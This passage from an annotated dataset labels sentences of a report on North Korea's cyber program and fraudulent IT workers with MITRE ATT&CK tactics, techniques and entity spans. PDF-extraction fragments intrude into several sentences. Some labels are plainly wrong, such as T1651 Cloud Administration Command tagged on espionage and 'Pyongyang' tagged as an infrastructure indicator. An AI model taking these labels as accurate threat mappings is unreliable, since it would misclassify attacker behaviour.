those who prefer to remain unnamed—and to 38 North and Martyn Williams, who can be.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s52-5f9a16", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 52, "context_before": "Special thanks to those who prefer to remain unnamed—and to 38 North and Martyn Williams, who can be.", "sentence_text": "I am forever grateful for your time and candor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s53-737079", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 53, "context_before": "I am forever grateful for your time and candor.", "sentence_text": "Special thanks also to DTEX for its WORKFORCEcritical role as a key contributor, bringing invaluable expertise and support IT throughout the process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s54-59173a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 54, "context_before": "Special thanks also to DTEX for its WORKFORCEcritical role as a key contributor, bringing invaluable expertise and support IT throughout the process.", "sentence_text": "Our affectionately self-named “misfit alliance” of public and private partners remains strong, and we’ll continue supporting HIDDEN the U.S. and its allies in countering the DPRK cyber threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s55-00497e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 55, "context_before": "Our affectionately self-named “misfit alliance” of public and private partners remains strong, and we’ll continue supporting HIDDEN the U.S. and its allies in countering the DPRK cyber threat.", "sentence_text": "AND Lastly, a word of caution: DPRK operatives are persistent and will try touncover who is studying them and how.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Attempts to uncover who is studying them and their methods", "entities": [ { "text": "DPRK operatives", "start": 31, "end": 46, "label": "ThreatActor" }, { "text": "persistent ", "start": 51, "end": 62, "label": "Action" }, { "text": "try touncover", "start": 71, "end": 84, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p7-s56-ce7d80", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 56, "context_before": "AND Lastly, a word of caution: DPRK operatives are persistent and will try touncover who is studying them and how.", "sentence_text": "They do not take kindly to scrutiny.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p7-s57-284685", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 7, "sentence_id": 57, "context_before": "They do not take kindly to scrutiny.", "sentence_text": "DPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p8-s58-bbe953", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 8, "sentence_id": 58, "context_before": "DPRK’S\nEXPOSING", "sentence_text": "DPRK Org Chart DPRK Cyber to Physical KWP = Workers' Party of Korea GSD = General Staff MSS = Ministry MID = Munitions Industry Dept Department of State Secur MND = Ministry of National Defense RGB", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p8-s59-3e3057", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 8, "sentence_id": 59, "context_before": "DPRK Org Chart DPRK Cyber to Physical KWP = Workers' Party of Korea GSD = General Staff MSS = Ministry MID = Munitions Industry Dept Department of State Secur MND = Ministry of National Defense RGB", "sentence_text": "= ReconnaissanceOrganization Assessment CHINYONG = Chinyong Information General Bureau Kim Jong-Un Technology Cooperation Company R-ITW = Revenue IT Workers M-ITW = Malicious IT Workers GSD Workers’ Party Ministry of of Korea State Security Reconnaissance General Bureau MID MND APT37 R-ITW 313TH M-ITW CHINYONG 3RD 5TH 227 RESEARCH M-ITW BUREAU BUREAU CENTER (AI)\nFront\nCompanies\nPoss Legacy Espionage + Espionage M-ITW Groups with Lab 110 Legacy 970th Unknown Subordination R-ITW Gwisin Gang APT43 APT45 Crypto Crime Konni Ruby Sleet Moonstone Sleet TEMP.Hermit TraderTraitor CryptoCore Poss ITW + AppleJeus KWP = Workers' Party of Korea GSD = General Staff MSS = Ministry MID = Munitions Industry Dept Department of State Security MND = Ministry of National Defense RGB = Reconnaissance CHINYONG = Chinyong Information General Bureau Technology Cooperation Company R-ITW = Revenue IT Workers M-ITW = Malicious IT Workers 8 Figure 1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p8-s60-3c6427", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 8, "sentence_id": 60, "context_before": "= ReconnaissanceOrganization Assessment CHINYONG = Chinyong Information General Bureau Kim Jong-Un Technology Cooperation Company R-ITW = Revenue IT Workers M-ITW = Malicious IT Workers GSD Workers’ Party Ministry of of Korea State Security Reconnaissance General Bureau MID MND APT37 R-ITW 313TH M-ITW CHINYONG 3RD 5TH 227 RESEARCH M-ITW BUREAU BUREAU CENTER (AI)\nFront\nCompanies\nPoss Legacy Espionage + Espionage M-ITW Groups with Lab 110 Legacy 970th Unknown Subordination R-ITW Gwisin Gang APT43 APT45 Crypto Crime Konni Ruby Sleet Moonstone Sleet TEMP.Hermit TraderTraitor CryptoCore Poss ITW + AppleJeus KWP = Workers' Party of Korea GSD = General Staff MSS = Ministry MID = Munitions Industry Dept Department of State Security MND = Ministry of National Defense RGB = Reconnaissance CHINYONG = Chinyong Information General Bureau Technology Cooperation Company R-ITW = Revenue IT Workers M-ITW = Malicious IT Workers 8 Figure 1.", "sentence_text": "DPRK cyber to physical: Organizational assessment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p8-s61-c9795c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 8, "sentence_id": 61, "context_before": "DPRK cyber to physical: Organizational assessment.", "sentence_text": "WORKFORCE IT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p8-s62-2ade80", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 8, "sentence_id": 62, "context_before": "WORKFORCE IT", "sentence_text": "SYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s63-ba1a31", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 63, "context_before": "SYNDICATE\nCYBER\nDPRK’S\nEXPOSING", "sentence_text": "Unconventional\nAttribution Methods for an Unconventional Program We have reached a key inflection point for the DPRK cyber program—one that calls for a reassessment of long-held assumptions about its sophistication and capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s64-65470c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 64, "context_before": "Unconventional\nAttribution Methods for an Unconventional Program We have reached a key inflection point for the DPRK cyber program—one that calls for a reassessment of long-held assumptions about its sophistication and capabilities.", "sentence_text": "By embracing less conventional attribution methods, we can open the door to more effective and relevant ways of understanding and thwarting DPRK cyber operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s65-b10200", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 65, "context_before": "By embracing less conventional attribution methods, we can open the door to more effective and relevant ways of understanding and thwarting DPRK cyber operations.", "sentence_text": "When historically tracking the DPRK, we likely never would have predicted that North Korea would be providing men and materials in support of a Russian land war in Europe while having hacked Russian hypersonic missile information just three years prior.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Provided support to Russian war effort and hacked Russian missile information", "entities": [ { "text": "DPRK", "start": 31, "end": 35, "label": "ThreatActor" }, { "text": "North Korea", "start": 79, "end": 90, "label": "ThreatActor" }, { "text": "Russian hypersonic missile information", "start": 191, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "providing ", "start": 100, "end": 110, "label": "Action" }, { "text": "hacked ", "start": 184, "end": 191, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p9-s66-904588", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 66, "context_before": "When historically tracking the DPRK, we likely never would have predicted that North Korea would be providing men and materials in support of a Russian land war in Europe while having hacked Russian hypersonic missile information just three years prior.", "sentence_text": "Nor could we have foreseen that DPRK operatives would successfully steal over $1.4 billion in cryptocurrency from a single victim.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Stole over $1.4 billion in cryptocurrency", "entities": [ { "text": "DPRK operatives ", "start": 32, "end": 48, "label": "ThreatActor" }, { "text": "$1.4 billion in cryptocurrency", "start": 78, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "steal ", "start": 67, "end": 73, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p9-s67-605b66", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 67, "context_before": "Nor could we have foreseen that DPRK operatives would successfully steal over $1.4 billion in cryptocurrency from a single victim.", "sentence_text": "What would have felt impossible for those tracking the DPRK back then is very obviously in the realm of the possible now.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s68-db22f2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 68, "context_before": "What would have felt impossible for those tracking the DPRK back then is very obviously in the realm of the possible now.", "sentence_text": "There is no “one size fits all” approach that can be taken when trying to understand the DPRK and its cyber activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s69-4e43ea", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 69, "context_before": "There is no “one size fits all” approach that can be taken when trying to understand the DPRK and its cyber activities.", "sentence_text": "We are a firm advocate of meeting the adversary where they are and learning to adapt as the adversary does.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s70-745949", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 70, "context_before": "We are a firm advocate of meeting the adversary where they are and learning to adapt as the adversary does.", "sentence_text": "Pyongyang’s cyber operations are hardly conventional.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s71-06e419", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 71, "context_before": "Pyongyang’s cyber operations are hardly conventional.", "sentence_text": "DPRK IT workers (ITW) have gained fraudulent employment at a multitude of Fortune 500 HIDDEN companies and have likely also infiltrated the cryptocurrency space to such a great extent AND that it would seem that every other Web3 project has a North Korean on the payroll.\nSYNDICATEAt the same time, discussions in both the public and private sectors have focused on defining what truly constitutes DPRK malicious cyber activity, determining the significance of certain CYBER subgroups, and deciding when to cluster or uncluster subsets of activity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Gained fraudulent employment at Fortune 500 companies and infiltrated cryptocurrency/Web3 projects", "entities": [ { "text": "DPRK IT workers", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "North Korean", "start": 243, "end": 255, "label": "ThreatActor" }, { "text": "Fortune 500 HIDDEN companies", "start": 74, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "DPRK ", "start": 398, "end": 403, "label": "ThreatActor" }, { "text": "Web3 project", "start": 224, "end": 236, "label": "Infrastructure_Indicator" }, { "text": "cryptocurrency space", "start": 140, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "gained fraudulent employment", "start": 27, "end": 55, "label": "Action" }, { "text": "infiltrated ", "start": 124, "end": 136, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p9-s72-5672c8", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 72, "context_before": "DPRK IT workers (ITW) have gained fraudulent employment at a multitude of Fortune 500 HIDDEN companies and have likely also infiltrated the cryptocurrency space to such a great extent AND that it would seem that every other Web3 project has a North Korean on the payroll.\nSYNDICATEAt the same time, discussions in both the public and private sectors have focused on defining what truly constitutes DPRK malicious cyber activity, determining the significance of certain CYBER subgroups, and deciding when to cluster or uncluster subsets of activity.", "sentence_text": "DPRK’S\nProtecting our organizations and critical assets from DPRK operatives requires a deep reset in how we think about the threat in the first place.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p9-s73-f449c1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 9, "sentence_id": 73, "context_before": "DPRK’S\nProtecting our organizations and critical assets from DPRK operatives requires a deep reset in how we think about the threat in the first place.", "sentence_text": "This starts with unpacking what the DPRK EXPOSINGis not.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s74-9703c5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 74, "context_before": "This starts with unpacking what the DPRK EXPOSINGis not.", "sentence_text": "Rethinking the DPRK:\nCorrecting Misconceptions\nBefore we dive in to how we understand the DPRK cyber program, let’s consider a few standard assumptions that are all too common in the DPRK watcher community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s75-7e0d6c", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 75, "context_before": "Rethinking the DPRK:\nCorrecting Misconceptions\nBefore we dive in to how we understand the DPRK cyber program, let’s consider a few standard assumptions that are all too common in the DPRK watcher community.", "sentence_text": "Not quite.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s76-a43d67", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 76, "context_before": "Not quite.", "sentence_text": "Actors likely associated with TraderTraitor have been mobilized for ad hoc cyber espionage efforts targeting the defense industrial base.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591", "name": "Gather Victim Org Information" } ], "procedure": "Mobilized for cyber espionage targeting defense industrial base", "entities": [ { "text": "TraderTraitor ", "start": 30, "end": 44, "label": "ThreatActor" }, { "text": "defense industrial base", "start": 113, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "targeting ", "start": 99, "end": 109, "label": "Action" }, { "text": "mobilized ", "start": 54, "end": 64, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p10-s77-c92068", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 77, "context_before": "Actors likely associated with TraderTraitor have been mobilized for ad hoc cyber espionage efforts targeting the defense industrial base.", "sentence_text": "Therefore, comparing TraderTraitor to groups such as TEMP.Hermit may not be entirely productive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s78-ae25b3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 78, "context_before": "Therefore, comparing TraderTraitor to groups such as TEMP.Hermit may not be entirely productive.", "sentence_text": "This is not the case, as observed infrastructure changes reflect operatives shifting between APTs and missions.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Shifts operatives between APTs and missions", "entities": [ { "text": "infrastructure ", "start": 34, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "shifting ", "start": 76, "end": 85, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p10-s79-d8565e", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 79, "context_before": "This is not the case, as observed infrastructure changes reflect operatives shifting between APTs and missions.", "sentence_text": "Former APT operators seemingly shift to managerial roles over IT teams, and APTs brokering animation jobs to help programmers raise illicit funds for Pyongyang.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Shifts operators to managerial roles and brokers animation jobs to raise illicit funds", "entities": [ { "text": "APT operators", "start": 7, "end": 20, "label": "ThreatActor" }, { "text": "APT", "start": 76, "end": 79, "label": "ThreatActor" }, { "text": "Pyongyang", "start": 150, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "shift ", "start": 31, "end": 37, "label": "Action" }, { "text": "brokering ", "start": 81, "end": 91, "label": "Action" }, { "text": "raise illicit funds", "start": 126, "end": 145, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p10-s80-c70634", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 80, "context_before": "Former APT operators seemingly shift to managerial roles over IT teams, and APTs brokering animation jobs to help programmers raise illicit funds for Pyongyang.", "sentence_text": "Whatever happened to Park Jin Hyok?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s81-8f85cf", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 81, "context_before": "Whatever happened to Park Jin Hyok?", "sentence_text": "two IT workers, personas WORKFORCE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s82-8ea697", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 82, "context_before": "two IT workers, personas WORKFORCE", "sentence_text": "Related information has been passed on to the AND appropriate authorities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p10-s83-6e2550", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 83, "context_before": "Related information has been passed on to the AND appropriate authorities.", "sentence_text": "Both are suspected to be associated with Chinyong related CYBER IT worker efforts.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Associated with Chinyong IT worker efforts", "entities": [ { "text": "Chinyong ", "start": 41, "end": 50, "label": "ThreatActor" }, { "text": "associated ", "start": 25, "end": 36, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p10-s84-e898e3", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 10, "sentence_id": 84, "context_before": "Both are suspected to be associated with Chinyong related CYBER IT worker efforts.", "sentence_text": "DPRK’S EXPOSING", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s85-80bd2b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 85, "context_before": "DPRK’S EXPOSING", "sentence_text": "Clearly, the DPRK’s cyber program is a more complex organization than traditional cyber threat intelligence methods can adequately capture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s86-f37277", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 86, "context_before": "Clearly, the DPRK’s cyber program is a more complex organization than traditional cyber threat intelligence methods can adequately capture.", "sentence_text": "An intelligence professional once advised to “stop looking at North Korea’s cyber program as a government program like the other major state programs and liken them to a single-family mafia organization and the lines begin to unblur.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s87-8a189d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 87, "context_before": "An intelligence professional once advised to “stop looking at North Korea’s cyber program as a government program like the other major state programs and liken them to a single-family mafia organization and the lines begin to unblur.”", "sentence_text": "This frame has aided in the understanding of this nation state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s88-a4dd5b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 88, "context_before": "This frame has aided in the understanding of this nation state.", "sentence_text": "Given the unconventional nature of the DPRK cyber ecosystem, we need to be unconventional in our approach to understanding it if we have any hope of stopping their activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s89-3702d4", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 89, "context_before": "Given the unconventional nature of the DPRK cyber ecosystem, we need to be unconventional in our approach to understanding it if we have any hope of stopping their activity.", "sentence_text": "North Korea’s limited internet access and highly regimented training pipeline for future cyber actors also sets it apart from other programs, with selected personnel training for future roles in cyber units from a very young age.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Trains selected personnel from a young age for future cyber roles", "entities": [ { "text": "North Korea", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "training ", "start": 166, "end": 175, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p11-s90-83e4c2", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 90, "context_before": "North Korea’s limited internet access and highly regimented training pipeline for future cyber actors also sets it apart from other programs, with selected personnel training for future roles in cyber units from a very young age.", "sentence_text": "WORKFORCE We group the regime’s priorities for the DPRK cyber program into the following key areas: IT • Cyber espionage to support regime, • Traditional foreign intelligence collection, HIDDEN economic, and military development especially targeting the U.S. and the AND goals, including the Weapons of Mass Republic of Korea (ROK).", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Conducts cyber espionage and intelligence collection to support regime and military development", "entities": [ { "text": "DPRK ", "start": 51, "end": 56, "label": "ThreatActor" }, { "text": "U.S.", "start": 254, "end": 258, "label": "Infrastructure_Indicator" }, { "text": "Republic of Korea (ROK)", "start": 308, "end": 331, "label": "Infrastructure_Indicator" }, { "text": "Weapons of Mass", "start": 292, "end": 307, "label": "Infrastructure_Indicator" }, { "text": "espionage ", "start": 111, "end": 121, "label": "Action" }, { "text": "collection", "start": 175, "end": 185, "label": "Action" }, { "text": "targeting ", "start": 240, "end": 250, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p11-s91-c6434a", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 91, "context_before": "WORKFORCE We group the regime’s priorities for the DPRK cyber program into the following key areas: IT • Cyber espionage to support regime, • Traditional foreign intelligence collection, HIDDEN economic, and military development especially targeting the U.S. and the AND goals, including the Weapons of Mass Republic of Korea (ROK).", "sentence_text": "Destruction (WMD) program.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s93-9c6322", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 93, "context_before": "•", "sentence_text": "The strategic placement of personnel for • Development of disruptive and “knowledge theft”—focusing on SYNDICATE destructive cyber attack capabilities for skills-based training to replicate the CYBER use in a wartime scenario.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" }, { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Strategically places personnel for knowledge theft and develops disruptive cyber attack capabilities", "entities": [ { "text": "strategic placement ", "start": 4, "end": 24, "label": "Action" }, { "text": "Development ", "start": 43, "end": 55, "label": "Action" }, { "text": "knowledge theft", "start": 74, "end": 89, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p11-s94-18e18d", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 94, "context_before": "The strategic placement of personnel for • Development of disruptive and “knowledge theft”—focusing on SYNDICATE destructive cyber attack capabilities for skills-based training to replicate the CYBER use in a wartime scenario.", "sentence_text": "mindset and capabilities of talented • Domestic and international individuals in creating innovative products DPRK’S counterintelligence and surveillance.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1592", "name": "Gather Victim Host Information" } ], "procedure": "Conducts domestic and international counterintelligence and surveillance", "entities": [ { "text": "DPRK", "start": 110, "end": 114, "label": "ThreatActor" }, { "text": "counterintelligence ", "start": 117, "end": 137, "label": "Action" }, { "text": "surveillance", "start": 141, "end": 153, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p11-s95-dda403", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 95, "context_before": "mindset and capabilities of talented • Domestic and international individuals in creating innovative products DPRK’S counterintelligence and surveillance.", "sentence_text": "and services that benefit the regime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p11-s96-98bd9b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 11, "sentence_id": 96, "context_before": "and services that benefit the regime.", "sentence_text": "• Revenue generation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s98-64277b", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 98, "context_before": "EXPOSING", "sentence_text": "New Day, New Tactics: Keeping up With the Regime We assess with high confidence that Pyongyang frequently authorizes changes to the structure and mandate of individual cyber units to ensure that the unit’s activities are aligned to the most critical regime objectives.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Authorizes changes to cyber unit structure and mandates to align with regime objectives", "entities": [ { "text": "Pyongyang ", "start": 85, "end": 95, "label": "ThreatActor" }, { "text": "authorizes changes", "start": 106, "end": 124, "label": "Action" }, { "text": "aligned ", "start": 221, "end": 229, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p12-s99-3023bb", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 99, "context_before": "New Day, New Tactics: Keeping up With the Regime We assess with high confidence that Pyongyang frequently authorizes changes to the structure and mandate of individual cyber units to ensure that the unit’s activities are aligned to the most critical regime objectives.", "sentence_text": "Kim Jong-un frequently signals his priorities for economic and military development in his annual addresses to the Korean Workers’ Party (KWP) plenary meetings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s100-ead7bc", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 100, "context_before": "Kim Jong-un frequently signals his priorities for economic and military development in his annual addresses to the Korean Workers’ Party (KWP) plenary meetings.", "sentence_text": "After his addresses, we have consistently observed the cyber program’s units quickly shifting to new mission areas in line with Kim’s statements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s101-d48af5", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 101, "context_before": "After his addresses, we have consistently observed the cyber program’s units quickly shifting to new mission areas in line with Kim’s statements.", "sentence_text": "The Talent Pipeline:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s102-aa6cba", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 102, "context_before": "The Talent Pipeline:", "sentence_text": "Cultivating DPRK’s Cyber Syndicate", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s103-925628", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 103, "context_before": "Cultivating DPRK’s Cyber Syndicate", "sentence_text": "In addition to frequent personnel realignments, DPRK also recruits talent differently from other state-sponsored threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Recruits talent and realigns personnel differently from other state actors", "entities": [ { "text": "DPRK ", "start": 48, "end": 53, "label": "ThreatActor" }, { "text": "recruits talent", "start": 58, "end": 73, "label": "Action" }, { "text": "personnel realignments", "start": 24, "end": 46, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p12-s104-ebed47", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 104, "context_before": "In addition to frequent personnel realignments, DPRK also recruits talent differently from other state-sponsored threat actors.", "sentence_text": "Rather than relying on domestic cybersecurity contractors,", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-79_mitre_report-p12-s105-a0b3a1", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 105, "context_before": "Rather than relying on domestic cybersecurity contractors,", "sentence_text": "These students then move through a pipeline of prestigious schools and universities and receive benefits for themselves and their families, such as relocation to Pyongyang and additional rations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Moves students through educational pipeline and provides benefits for cyber recruitment", "entities": [ { "text": "Pyongyang ", "start": 162, "end": 172, "label": "Infrastructure_Indicator" }, { "text": "move through", "start": 20, "end": 32, "label": "Action" }, { "text": "receive benefits", "start": 88, "end": 104, "label": "Action" }, { "text": "relocation ", "start": 148, "end": 159, "label": "Action" } ] }, { "uid": "mitre-79_mitre_report-p12-s106-d75da0", "source": "mitre", "doc_id": "79_mitre_report", "page_number": 12, "sentence_id": 106, "context_before": "These students then move through a pipeline of prestigious schools and universities and receive benefits for themselves and their families, such as relocation to Pyongyang and 